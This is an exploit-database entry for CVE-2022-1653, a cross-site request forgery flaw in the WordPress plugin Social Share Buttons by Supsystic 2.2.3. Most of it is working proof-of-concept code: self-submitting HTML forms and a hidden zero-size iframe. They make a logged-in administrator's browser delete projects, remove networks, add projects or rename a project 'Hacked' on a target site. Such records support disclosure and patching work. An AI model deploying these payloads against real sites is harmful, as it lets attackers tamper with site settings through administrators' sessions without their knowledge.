CVE: CVE-2022-1653

Name: Social Share Buttons by Supsystic (social-share-buttons-by-supsystic)

Version: 2.2.3

Date: 2022-04-17 11:49:27

Advisory: https://wpscan.com/vulnerability/52eff451-8ce3-4ac4-b530-3196aa82db48

Type: CSRF

Exploit: 


<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="route[module]" value="projects">
    <input type="text" name="route[action]" value="removeNetwork">
    <input type="text" name="network_id" value="1">
    <input type="text" name="project_id" value="4">
    <input type="text" name="action" value="social-sharing">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="route[module]" value="projects">
    <input type="text" name="route[action]" value="add">
    <input type="text" name="title" value="test">
    <input type="text" name="design" value="flat">
    <input type="text" name="networks[0]" value="1">
    <input type="text" name="action" value="social-sharing">
</form>
<script>
    document.forms[0].submit();
</script>


<form action="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=2" method="POST">
</form>
<script>
    document.forms[0].submit();
</script>


<iframe src="https://example.com/wp-admin/admin.php?page=supsystic-social-sharing&module=projects&action=delete&id=3" width="0" height="0" frameborder="0"></iframe>


<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
    <input type="text" name="route[module]" value="projects">
    <input type="text" name="route[action]" value="rename">
    <input type="text" name="title" value="Hacked">
    <input type="text" name="id" value="4">
    <input type="text" name="action" value="social-sharing">
</form>
<script>
    document.forms[0].submit();
</script>